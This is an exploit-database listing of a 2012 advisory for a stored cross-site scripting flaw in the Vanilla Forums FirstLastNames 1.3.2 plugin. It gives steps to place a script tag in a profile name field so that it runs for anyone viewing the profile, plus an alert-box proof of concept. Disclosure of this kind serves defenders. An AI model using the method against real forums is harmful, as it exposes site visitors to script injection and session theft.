[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS

Author
Henry Hoggard
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-18328
Category
web applications
Date add
18-05-2012
Platform
php
# Title: Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS Vulnerability
# Date: 18/5/12
# Author: Henry Hoggard
# Author URL: henryhoggard.co.uk
# Author Twitter: @henryhoggard
# Software: Vanilla Version 2.0.18.4 + FirstLastNames 1.3.2
 
http://vanillaforums.org/addon/firstlastnames-plugin
 
# http://vanillaforums.org
#############################################################
 
On Edit your account enter your XSS String in either the first name or last name field.
Then if a user visits your page the XSS will execute.
 
http://target.tld/index.php?p=/profile/myprofile/1/user
 
XSS:
<script>alert('x')</script>
 
#############################################################
 
http://henryhoggard.co.uk



#  0day.today [2024-12-25]  #